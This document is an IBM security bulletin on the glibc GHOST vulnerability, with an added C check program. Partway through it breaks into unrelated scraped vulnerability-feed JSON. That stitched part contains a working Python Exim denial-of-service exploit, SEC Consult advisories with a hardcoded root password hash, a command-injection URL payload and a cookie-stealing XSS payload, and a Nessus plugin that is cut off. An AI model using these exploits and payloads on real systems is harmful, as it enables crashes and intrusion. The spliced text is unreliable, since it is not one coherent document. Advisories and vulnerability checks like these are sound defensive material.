## Summary
A GNU C Library (glibc) vulnerability, referred to as GHOST, affects IBM Security Network Intrusion Prevention System.
## Vulnerability Details
**CVEID:** [_CVE-2015-0235_](<https://vulners.com/cve/CVE-2015-0235>)
**DESCRIPTION:** glibc is vulnerable to a heap-based buffer overflow, caused by improper bounds checking by the __nss_hostname_digits_dots() function. By sending an invalid hostname argument, a remote attacker could overflow a buffer and execute arbitrary code on the system or cause the application to crash.
CVSS Base Score: 7.6
CVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/100386_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/100386>) for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (AV:N/AC:H/Au:N/C:C/I:C/A:C)
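As an added local check (not part of the IBM bulletin, modelled on the widely circulated canary test for this CVE), the C program below calls gethostbyname_r() with a digits-only hostname sized so that the under-counted allocation in __nss_hostname_digits_dots() would spill exactly sizeof(char *) bytes past the caller's buffer, and reports whether the libc on the host actually overwrote the memory placed there:

```c
#define _GNU_SOURCE
#include <errno.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Marker placed directly after the buffer handed to gethostbyname_r(). */
#define CANARY "in_the_coal_mine"

enum ghost_status {
    GHOST_NOT_VULNERABLE = 0,  /* glibc rejected the request with ERANGE */
    GHOST_VULNERABLE     = 1,  /* the canary was overwritten */
    GHOST_INCONCLUSIVE   = 2   /* neither: non-glibc libc or unexpected result */
};

/*
 * Result buffer and canary laid out back to back. A vulnerable
 * __nss_hostname_digits_dots() under-counts the space it needs by
 * sizeof(char *) and writes that many bytes past `buffer`, clobbering
 * the canary; a fixed glibc notices the buffer is too small and returns
 * ERANGE before writing anything.
 */
struct probe {
    char buffer[1024];
    char canary[sizeof(CANARY)];
};

enum ghost_status ghost_check(void)
{
    struct probe temp;
    struct hostent resbuf;
    struct hostent *result = NULL;
    int herrno = 0;
    int retval;
    /*
     * A name made only of digits is treated as an IP literal and copied
     * into the caller's buffer together with 16 bytes of address storage
     * and two address pointers. Choose its length so the vulnerable size
     * computation exactly fills the buffer, leaving the forgotten
     * sizeof(char *) bytes to land on the canary.
     */
    size_t len = sizeof(temp.buffer) - 16 * sizeof(unsigned char)
                 - 2 * sizeof(char *) - 1;
    char name[sizeof(temp.buffer)];

    memset(temp.buffer, 0, sizeof(temp.buffer));
    memcpy(temp.canary, CANARY, sizeof(CANARY));
    memset(name, '0', len);
    name[len] = '\0';

    retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer),
                             &result, &herrno);

    if (memcmp(temp.canary, CANARY, sizeof(CANARY)) != 0)
        return GHOST_VULNERABLE;
    if (retval == ERANGE)
        return GHOST_NOT_VULNERABLE;
    return GHOST_INCONCLUSIVE;
}

const char *ghost_status_name(enum ghost_status s)
{
    switch (s) {
    case GHOST_NOT_VULNERABLE: return "not vulnerable";
    case GHOST_VULNERABLE:     return "vulnerable";
    default:                   return "inconclusive";
    }
}

int main(void)
{
    enum ghost_status s = ghost_check();
    printf("CVE-2015-0235 local check: %s\n", ghost_status_name(s));
    return s == GHOST_VULNERABLE ? EXIT_FAILURE : EXIT_SUCCESS;
}
```

Run it on a host carrying the same glibc build as the appliance firmware; an "inconclusive" result means the libc rejected the name for some other reason (for example a non-glibc libc) and says nothing either way.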
## Affected Products and Versions
Products: GX3002, GX4002, GX4004, GX4004-v2, GX5008, GX5008-v2, GX5108, GX5108-v2, GX5208, GX5208-v2, GX6116, GX7412, GX7412-10, GX7412-05, GX7800, GV200, GV1000
Firmware versions: 4.6.2, 4.6.1, 4.6, 4.5, 4.4, and 4.3
## Remediation/Fixes
Apply the fix pack matching the installed firmware version; each fix pack applies to all IBM Security Network Intrusion Prevention System products at that version:

| Firmware version | Fix |
|---|---|
| 4.6.2 | [_4.6.2.0-ISS-ProvG-AllModels-System-FP0006_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm%2FTivoli%2FProventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>) |
| 4.6.1 | [_4.6.1.0-ISS-ProvG-AllModels-System-FP0010_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm%2FTivoli%2FProventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>) |
| 4.6 | [_4.6.0.0-ISS-ProvG-AllModels-System-FP0008_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm%2FTivoli%2FProventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>) |
| 4.5 | [_4.5.0.0-ISS-ProvG-AllModels-System-FP0010_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm%2FTivoli%2FProventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>) |
| 4.4 | [_4.4.0.0-ISS-ProvG-AllModels-System-FP0010_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm%2FTivoli%2FProventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>) |
| 4.3 | [_4.3.0.0-ISS-ProvG-AllModels-System-FP0008_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm%2FTivoli%2FProventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>) |
## Workarounds and Mitigations
None
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\r\n 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\r\n# Connection closed by foreign host.\r\n#\r\n# user () debian-7-7-64b:~$ dmesg\r\n# ...\r\n# [ 1715.842547] exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in\r\n# libc-2.13.so[7fabef2a2000+182000]\r\n\r\nimport socket\r\nimport time\r\nimport sys, getopt\r\n\r\ndef main(argv):\r\n argc = len(argv)\r\n\r\n if argc <= 1:\r\n print \"usage: %s <host>\" % (argv[0])\r\n sys.exit(0)\r\n\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n buffer = 
\"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\r\n 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\r\n target = argv[1] # SET TARGET\r\n port = argv[2] # SET PORT\r\n\r\n print \"(--==== Exim ESMTP DoS Exploit by 1N3 - https://crowdshield.com\"\r\n print \"(--==== Sending GHOST SMTP DoS to \" + target + \":\" + port + \" with length:\" +str(len(buffer))\r\n s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n connect=s.connect((target,int(port)))\r\n data = s.recv(1024)\r\n print \"CONNECTION: \" +data\r\n s.send('HELO ' + buffer + '\\r\\n')\r\n data = s.recv(1024)\r\n print \"received: \" +data\r\n s.send('EHLO ' + buffer + '\\r\\n')\r\n data = s.recv(1024)\r\n print \"received: \" +data\r\n s.close()\r\n\r\nmain(sys.argv)\n\n# 0day.today [2018-01-01] #", "sourceHref": "https://0day.today/exploit/23215", "cvss": {"score": 10.0, 
"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2023-03-14T00:47:42", "description": "Nexans FTTO GigaSwitch industrial/office switches HW version 5 suffer from having a hardcoded backdoor user and multiple outdated vulnerable software components.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-21T00:00:00", "type": "zdt", "title": "Nexans FTTO GigaSwitch Outdated Components / Hardcoded Backdoor Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235", "CVE-2015-7547", "CVE-2015-9261", "CVE-2017-16544", "CVE-2022-32985"], "modified": "2022-06-21T00:00:00", "id": "1337DAY-ID-37806", "href": "https://0day.today/exploit/description/37806", "sourceData": "=======================================================================\n title: Hardcoded Backdoor User and Outdated Software Components\n product: Nexans FTTO GigaSwitch industrial/office switches HW version 5\n vulnerable version: See \"Vulnerable / tested versions\"\n fixed version: V6.02N, V7.02\n CVE number: CVE-2022-32985\n impact: High\n homepage: https://www.nexans.com/\n found: 
2020-05-25\n by: T. Weber (Office Vienna)\n SEC Consult Vulnerability Lab\n\n An integrated part of SEC Consult, an Atos company\n Europe | Asia | North America\n\n https://www.sec-consult.com\n\n=======================================================================\n\nVendor description:\n-------------------\n\"As a global player in the cable industry, Nexans is behind the scenes\ndelivering the innovative services and resilient products that carry thousands\nof watts of energy and terabytes of data per second around the world. Millions\nof homes, cities, businesses are powered every day by Nexans\u2019 high-quality\nsustainable cabling solutions. We help our customers meet the challenges they\nface in the fields of energy infrastructure, energy resources, transport,\nbuildings, telecom and data, providing them with solutions and services for the\nmost complex cable applications in the most demanding environments.\"\n\nSource: https://www.nexans.com/company/What-we-do.html\n\n\nBusiness recommendation:\n------------------------\nThe vendor provides a patch which should be installed immediately.\n\nSEC Consult recommends to perform a thorough security review of these\nproducts conducted by security professionals to identify and resolve all\nsecurity issues.\n\n\nVulnerability overview/description:\n-----------------------------------\n1) Outdated Vulnerable Software Components\nA static scan with the IoT Inspector (ONEKEY) revealed outdated software packages that\nare used in the devices' firmware. Four of them were verified by using the\nMEDUSA scalable firmware runtime.\n\n\n2) Hardcoded Backdoor User (CVE-2022-32985)\nA hardcoded root user was found in \"/etc/passwd\". 
In combination with the\ninvoked dropbear SSH daemon in the libnx_apl.so library, it can be used on port\n50201 and 50200 to login on a system shell.\n\n\nProof of concept:\n-----------------\n1) Outdated Vulnerable Software Components\nBased on an automated scan with the IoT Inspector (ONEKEY) the following third party\nsoftware packages were found to be outdated:\n\nFirmware version 6.02L:\nBusyBox 1.20.2\nDropbear SSH 2012.55\nGNU glibc 2.17\nlighttpd 1.4.48\nOpenSSL 1.0.2h\n\nThe following CVEs were verified with MEDUSA scalable firmware emulation:\n\n* CVE-2015-9261 (Unzip)\nThe crafted ZIP archive \"x_6170921383890712452.bin\" was taken from:\nhttps://www.openwall.com/lists/oss-security/2015/10/25/3\nExecution inside the firmware emulation:\n\nbash-4.2# unzip x_6170921383890712452.bin\nArchive: x_6170921383890712452.bin\n inflating: ]3j\u00bdr\u00abIK-%Ix\ndo_page_fault(): sending SIGSEGV to unzip for invalid read access from 735ededc\nepc = 0044bb28 in busybox[400000+99000]\nra = 0044b968 in busybox[400000+99000]\nSegmentation fault\n\n\n* CVE-2015-0235 (gethostbyname \"GHOST\" buffer overflow)\n\nPoC code was taken from:\nhttps://gist.github.com/dweinstein/66e6a088191ac0e8105c\n\n\n* CVE-2015-7547 (getaddrinfo buffer overflow)\n\nPoC code was taken from:\nhttps://github.com/fjserna/CVE-2015-7547\n\n-bash-4.4# python /medusa_exploits/cve-2015-7547-poc.py &\n[1] 259\n-bash-4.4# chroot /medusa_rootfs/ bin/bash\nbash-4.2# cd /medusa_exploits/\nbash-4.2# ./cve-2015-7547_glibc_getaddrinfo\n[UDP] Total Data len recv 36\n[UDP] Total Data len recv 36\nConnected with 127.0.0.1:34356\n[TCP] Total Data len recv 76\n[TCP] Request1 len recv 36\n[TCP] Request2 len recv 36\nSegmentation fault\n\n\n* CVE-2017-16544 (shell autocompletion vulnerability)\n\nA file with the name \"\\ectest\\n\\e]55;test.txt\\a\" was created to trigger the\nvulnerability.\n-------------------------------------------------------------------------------\n# ls \"pressing 
<TAB>\"\ntest\n]55;test.txt\n#\n-------------------------------------------------------------------------------\n\n\n2) Hardcoded Backdoor User (CVE-2022-32985)\nThe hardcoded system user, reachable via the dropbear SSH daemon was found due\nto multiple indications on the system. The undocumented root user itself was\ncontained in the \"passwd\" file:\n\nContent of the file \"/etc/passwd\".\n-------------------------------------------------------------------------------\nroot:oFQzvQf5qrI56:0:0:root:/home/root:/bin/sh\n[...]\n-------------------------------------------------------------------------------\n\nA suspicious port for the SSH daemon was chosen in the config file of dropbear:\n\nContent of the file \"/etc/init.d/dropbear\":\n-------------------------------------------------------------------------------\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\nDAEMON=/usr/sbin/dropbear\nNAME=dropbear\nDESC=\"Dropbear SSH server\"\nPIDFILE=/var/run/dropbear.pid\n\nDROPBEAR_PORT=\"50200 -p 50201\"\n[...]\n-------------------------------------------------------------------------------\n\nThis is invoked from \"/usr/lib/libnx_apl.so.0.0.0\", which can be seen in the\nfollowing pseudo-code:\n-------------------------------------------------------------------------------\nvoid dropbear_server_init(char param_1)\n\n{\n __pid_t __pid;\n char *pcVar1;\n int aiStack16 [2];\n\n __pid = fork();\n if (__pid == 0) {\n __pid = fork();\n if (__pid != 0) {\n /* WARNING: Subroutine does not return */\n exit(0);\n }\n if (param_1 == '\\0') {\n pcVar1 = \"/etc/init.d/dropbear stop\";\n }\n else {\n pcVar1 = \"/etc/init.d/dropbear start\"; <---\n }\n execl(\"/bin/sh\",\"sh\",&DAT_2cd91564,pcVar1,0);\n }\n else {\n waitpid(__pid,aiStack16,0);\n }\n return;\n}\n-------------------------------------------------------------------------------\n\n\nThis function is called if a specific command is issued in the CLI 
interface:\n-------------------------------------------------------------------------------\n[...]\n iVar6 = telnet_cmp_command((char *)(param_3 + 0xf2),\"ssh\",2);\n if (iVar6 != 0) {\n if (param_2 < 4) {\n netbuf_fwd_sprintf(param_1,\"\\r\\n%%Error: Parameter missing\\r\\n\");\n iVar6 = shared_mem_get_addr(&var_shm);\n iVar7 = shared_mem_get_addr(&var_shm);\n uVar8 = shared_mem_read_u8(&var_shm,iVar7 + 0x161a);\n shared_mem_write_u8(&var_shm,iVar6 + 0x161a,uVar8 & 0xff | 0x10);\n return;\n }\n iVar6 = telnet_cmp_command((char *)(param_3 + 0x16b),\"start\",1);\n if (iVar6 != 0) {\n dropbear_server_init('\\x01'); <---\n netbuf_fwd_sprintf(param_1,\"Starting dropbear...\\r\\n\");\n return;\n }\n iVar6 = telnet_cmp_command((char *)(param_3 + 0x16b),\"stop\",1);\n if (iVar6 != 0) {\n dropbear_server_init('\\0'); <---\n netbuf_fwd_sprintf(param_1,\"Stopping dropbear...\\r\\n\");\n return;\n }\n netbuf_fwd_sprintf(param_1,\"Uknown dropbear command...\\r\\n\");\n return;\n[...]\n-------------------------------------------------------------------------------\nThe mentioned library is used in the CLI program that is running on the device.\n\n\nVulnerable / tested versions:\n-----------------------------\nThe following firmware versions have been tested:\n\n* Nexans FTTO GigaSwitch HW Version 5 (all industrial/office switches) / Firmware 6.02L\n* Nexans FTTO GigaSwitch HW Version 5 (all industrial/office switches) / Firmware 5.04M\n\n\nVendor contact timeline:\n------------------------\n2020-05-28: Contacting the vendor's PSIRT under the following link:\n http://www.nexans-ans.de/support/index.php?u=security_portal_sendmail\n No answer.\n2020-06-08: Contacting vendor again via [email\u00a0protected] Extended\n deadline by 11 days.\n2020-06-16: Telephone call with Nexans representative. Security advisory was\n received. It will be reviewed to confirm the found issues.\n2020-06-26: Telephone call with Nexans representative. 
Nexans is working on the\n reported issues and will remove the dropbear daemon as first\n measure.\n2020-08-04: Vendor stated that a fix for the outdated software components will\n be available in November.\n2020-11-12: Asked for status update.\n2020-11-16: Contact stated, that firmware test will need more time. Updates are\n estimated to be ready in Q1 of 2020.\n2020-11-20: Vendor confirmed Q1 as estimated disclosure date.\n2021-01-21: Asked for status update; Vendor stated that the release with all\n fixes is aimed to be published end of Q1.\n2021-03-09: Asked for status update.\n2021-03-17: Vendor stated that the firmware is in testing stage. The fixed\n firmware will be released in May.\n2021-06-10: Asked for status update.\n2021-06-14: Vendor stated that the firmware is not ready due to COVID19 and\n homeschooling. The fixed firmware will be released end of August.\n2021-08-31: Asked for status update.\n2021-09-07: Vendor stated that the fixed firmware will be ready end of 2021.\n2022-05-23: Informed vendor that the advisory will be released mid of June 2022.\n2022-05-24: Firmware V7.02 is available for download which fixes most outdated\n components issues.\n2022-06-15: Release of security advisory.\n\n\nSolution:\n---------\nThe vendor provides an updated firmware here:\nhttps://www.nexans-ans.de/support/firmware/\n\nFirmware version V6.02N has the backdoor removed and was already published a while ago.\nVersion V7.02 also has the backdoor removed and most of the outdated software issues.\n", "sourceHref": "https://0day.today/exploit/37806", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-23T04:23:08", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-01T00:00:00", "type": "zdt", "title": "Moxa Command Injection / Cross Site Scripting Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1914", "CVE-2013-7423", "CVE-2015-0235", "CVE-2015-7547", "CVE-2016-1234", "CVE-2021-39278", "CVE-2021-39279"], "modified": "2021-09-01T00:00:00", "id": "1337DAY-ID-36699", "href": "https://0day.today/exploit/description/36699", "sourceData": "=======================================================================\n title: Multiple vulnerabilities\n product: see \"Vulnerable / tested versions\"\n vulnerable version: see \"Vulnerable / tested versions\"\n fixed version: see \"Solution\"\n CVE number: CVE-2021-39278, CVE-2021-39279\n impact: High\n homepage: https://www.moxa.com/\n found: 2020-08-31\n by: T. Weber (Office Vienna)\n SEC Consult Vulnerability Lab\n\n An integrated part of SEC Consult, an Atos company\n Europe | Asia | North America\n\n https://www.sec-consult.com\n\n=======================================================================\n\nVendor description:\n-------------------\n\"Together, We Create Change\n\nMoxa is committed to making a positive impact around the world. 
We put our all\nbehind this commitment--from our employees, to our products and supply chain.\n\nIn our local communities, we nurture and support the spirit of volunteering.\nWe encourage our employees to contribute to community development, with an\nemphasis on ecology, education, and health.\n\nIn our products, we invest in social awareness programs and\nenvironment-friendly policies at every stage of the product lifecycle. We make\nsure our manufacturing meets the highest standards with regards to quality,\nethics, and sustainability.\"\n\nSource: https://www.moxa.com/en/about-us/corporate-responsibility\n\nBusiness recommendation:\n------------------------\nSEC Consult recommends to immediately apply the available patches\nfrom the vendor. A thorough security review should be performed by\nsecurity professionals to identify further potential security issues.\n\n\nVulnerability overview/description:\n-----------------------------------\n1) Authenticated Command Injection (CVE-2021-39279)\nAn authenticated command injection vulnerability can be triggered by issuing a\nGET request to the \"/forms/web_importTFTP\" CGI program which is available on\nthe web interface. An attacker can abuse this vulnerability to compromise the\noperating system of the device. This issue was found by emulating the firmware\nof the device.\n\n2) Reflected Cross-Site Scripting via Manipulated Config-File (CVE-2021-39278)\nVia a crafted config-file, a reflected cross-site scripting vulnerability can\nbe exploited in the context of the victim's browser. This config-file can be\nuploaded to the device via the \"Config Import Export\" tab in the main menu.\n\n3) Known GNU glibc Vulnerabilities (CVE-2015-0235)\nThe used GNU glibc in version 2.9 is outdated and contains multiple known\nvulnerabilities. 
One of the discovered vulnerabilities (CVE-2015-0235,\ngethostbyname \"GHOST\" buffer overflow) was verified by using the MEDUSA\nscalable firmware runtime.\n\n4) Multiple Outdated Software Components\nMultiple outdated software components containing vulnerabilities were found by\nthe IoT Inspector.\n\nThe vulnerabilities 1), 2) and 3) were manually verified on an emulated device\nby using the MEDUSA scalable firmware runtime.\n\nProof of concept:\n-----------------\n1) Authenticated Command Injection (CVE-2021-39279)\nThe vulnerability can be triggered by navigating in the web interface to the\ntab:\n\n\"Main Menu\"->\"Maintenance\"->\"Config Import Export\"\n\nThe \"TFTP Import\" menu is prone to command injection via all parameters. To\nexploit the vulnerability, an IP address, a configuration path and a filename\nmust be set.\nIf the filename is used to trigger the exploit, the payload in the interceptor\nproxy would be:\n\nhttp://192.168.1.1/forms/web_importTFTP?servIP=192.168.1.1&configPath=/&fileName=name|`ping localhost -c 100`\n\n\n2) Reflected Cross-Site Scripting via Manipulated Config-File (CVE-2021-39278)\nThe vulnerability can be triggered by navigating in the web interface to the\ntab:\n\n\"Main Menu\"->\"Maintenance\"->\"Config Import Export\"\n\nThe \"Config Import\" menu is prone to reflected cross-site scripting via the\nupload of config files. 
Example of malicious config file:\n-------------------------------------------------------------------------------\n[board]\ndeviceName=\"WAC-2004_0000</span><script>alert(document.cookie)</script>\"\ndeviceLocation=\"\"\n[..]\n-------------------------------------------------------------------------------\nUploading such a crafted file triggers cross-site scripting as the erroneous\nvalue is displayed without filtering characters.\n\n\n3) Known GNU glibc Vulnerabilities (CVE-2015-0235)\nGNU glibc version 2.9 contains multiple CVEs like:\nCVE-2016-1234, CVE-2015-7547, CVE-2013-7423, CVE-2013-1914, and more.\n\nThe gethostbyname buffer overflow vulnerability (GHOST) was checked with the\nhelp of the exploit code from https://seclists.org/oss-sec/2015/q1/274. It was\ncompiled and executed on the emulated device to test the system.\n\n\n4) Multiple Outdated Software Components\nThe IoT Inspector recognized multiple outdated software components with known\nvulnerabilities:\n\nBusyBox 1.18.5 06/2011\nDropbear SSH 2011.54 11/2011\nGNU glibc 2.9 02/2009\nLinux Kernel 2.6.27 10/2008\nOpenSSL 0.9.7g 04/2005\nOnly found in the program \"iw_director\"\nOpenSSL 1.0.0 03/2010\n\n\nVulnerable / tested versions:\n-----------------------------\nThe following firmware versions for various devices have been identified\nto be vulnerable:\n* WAC-2004 / 1.7\n* WAC-1001 / 2.1\n* WAC-1001-T / 2.1\n* OnCell G3470A-LTE-EU / 1.7\n* OnCell G3470A-LTE-EU-T / 1.7\n* TAP-323-EU-CT-T / 1.3\n* TAP-323-US-CT-T / 1.3\n* TAP-323-JP-CT-T / 1.3\n* WDR-3124A-EU / 2.3\n* WDR-3124A-EU-T / 2.3\n* WDR-3124A-US / 2.3\n* WDR-3124A-US-T / 2.3\n\n\nVendor contact timeline:\n------------------------\n2020-10-09: Contacting vendor through [email\u00a0protected]\n2020-10-12: Contact sends PGP key for encrypted communication and asks for the\n detailed advisory. Sent encrypted advisory to vendor.\n2020-11-06: Status update from vendor regarding technical analysis. 
Vendor\n requested more time for fixing the vulnerabilities as more products\n are affected.\n2020-11-09: Granted more time for fixing to vendor.\n2020-11-10: Vendor asked for next steps regarding the advisory publication.\n2020-11-11: Asked vendor for an estimation when a public disclosure is possible.\n2020-11-16: Vendor responded that the product team can give a rough feedback.\n2020-11-25: Asked for a status update.\n2020-11-25: Vendor responded that the investigation is not done yet.\n2020-12-14: Vendor provided a list of potential affected devices and stated\n that full investigation may take until January 2021 due to the list\n of CVEs that were provided with the appended IoT Inspector report.\n The patches may be available until June 2021.\n2020-12-15: Shifted next status update round with vendor on May 2021.\n2020-12-23: Vendor provided full list of affected devices.\n2021-02-05: Vendor sieved out the found issues from 4) manually and provided a\n full list of confirmed vulnerabilities. WAC-2004 phased-out in\n 2019.\n2021-02-21: Confirmed receive of vulnerabilities, next status update in May\n 2021.\n2021-06-10: Asking for an update.\n2021-06-15: Vendor stated, that the update will be provided in the next days.\n2021-06-21: Vendor will give an update in the next week as Covid gets worse in\n Taiwan.\n2021-06-23: Vendor stated, that patches are under development. Vendor needs more\n time to finish the patches.\n2021-06-24: Set release date to 2021-09-01.\n2021-07-02: Vendor provides status updates.\n2021-08-16: Vendor provides status updates.\n2021-08-17: Vendor asks for CVE IDs and stated, that WDR-3124A has phased-out.\n2021-08-20: Sent assigned CVE-IDs to vendor. 
Asked for fixed version numbers.\n2021-08-31: Vendor provides fixed firmware version numbers and the advisory\n links.\n2021-09-01: Coordinated release of security advisory.\n\nSolution:\n---------\nAccording to the vendor the following patches must be applied to fix issues:\n* WAC-1001 / 2.1.5\n* WAC-1001-T / 2.1.5\n* OnCell G3470A-LTE-EU / 1.7.4\n* OnCell G3470A-LTE-EU-T / 1.7.4\n* TAP-323-EU-CT-T / 1.8.1\n* TAP-323-US-CT-T / 1.8.1\n* TAP-323-JP-CT-T / 1.8.1\n\nThe Moxa Technical Support must be contacted for requesting the security\npatches.\n\nThe corresponding security advisories for the affected devices are available on\nthe vendor's website:\nTAP-323/WAC-1001/WAC-2004\nhttps://www.moxa.com/en/support/product-support/security-advisory/tap-323-wac-1001-2004-wireless-ap-bridge-client-vulnerabilities\nOnCell G3470A-LTE/WDR-3124A\nhttps://www.moxa.com/en/support/product-support/security-advisory/oncell-g3470a-wdr-3124a-cellular-gateways-router-vulnerabilities\n\nThe following device models are EOL and should be replaced:\n* WAC-2004\n* WDR-3124A-EU\n* WDR-3124A-EU-T\n* WDR-3124A-US\n* WDR-3124A-US-T\n", "sourceHref": "https://0day.today/exploit/36699", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-01-11T14:46:46", "description": "A heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. 
(CVE-2015-0235)", "cvss3": {}, "published": "2015-01-28T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : glibc on SL6.x, SL7.x i386/x86_64 (20150127) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:glibc", "p-cpe:/a:fermilab:scientific_linux:glibc-common", "p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo", "p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo-common", "p-cpe:/a:fermilab:scientific_linux:glibc-devel", "p-cpe:/a:fermilab:scientific_linux:glibc-headers", "p-cpe:/a:fermilab:scientific_linux:glibc-static", "p-cpe:/a:fermilab:scientific_linux:glibc-utils", "p-cpe:/a:fermilab:scientific_linux:nscd", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20150127_GLIBC_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/81038", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81038);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_xref(name:\"CERT\", value:\"967332\");\n\n script_name(english:\"Scientific Linux Security Update : 